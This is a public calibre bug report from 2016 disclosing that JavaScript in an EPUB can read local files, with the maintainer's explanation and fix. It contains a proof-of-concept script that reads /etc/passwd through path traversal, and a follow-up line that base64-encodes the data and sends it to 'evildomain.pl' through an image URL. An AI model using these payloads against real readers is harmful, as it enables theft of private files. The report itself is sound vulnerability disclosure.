Local file access trought javascript in epub View

Bug #1651728 reported by Jędrzej on 2016-12-21
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
calibre
Undecided
Unassigned

Bug Description

Hello,

Calibre can access the local files using javascript in epub file.

Code snippet:
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script>
    $.getScript( "../../../../../../../../etc/passwd", function( data, textStatus, jqxhr ) {
        document.write('<h1>Your data</h1><pre>' + data + '</pre>');
    });
</script>

Attacker can steal any victim file and send to server.

Tested on: Mac, i think it will work on any OS
Version: 2.74.0

Jędrzej (yendrzei) wrote :

Crafted epub file.

Payload on page 3

tags: added: security

This comes from the default security policy of Qt WebKit, which calibre
uses. While it is true that the javascript can be used to read any file
on the computer, the attacker cannot do anything with the data, since
connecting to remote urls is disabled. See the
LocalContentCanAccessRemoteUrls setting in https://doc.qt.io/qt-4.8/qwebsettings.html#WebAttribute-enum

Nonetheless, to be doubly secure, I will also turn off LocalContentCanAccessFileUrls
since as far as I can tell, it is not needed for the operation of the viewer.

Also, note that the viewer is in the process of being replaced with a
completely new implementation that only runs the ebook content in a
sandboxed iframe (you can see the new viewer implementation in action by
running it in your web browser via calibre-debug --new-server)

Fixed in branch master. The fix will be in the next release. calibre is usually released every Friday.

 status fixreleased

Changed in calibre:
status: New → Fix Released
Jędrzej (yendrzei) wrote :

Hi,

i think it's not true that attacker cannot do anything with data. When I put img tag:
<img src="http://remote_addres/some.jpg"> Calibre will render this.

When attacker change document.write in payload to this:
document.write('<img src="http://evildomain.pl/some.jpg?data=' + btoa(data) + '">');
could easily read data from server log.

Thank you for very fast fix :).

You're welcome and thanks for the bug report :)

Kovid Goyal (kovid) on 2017-01-29
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers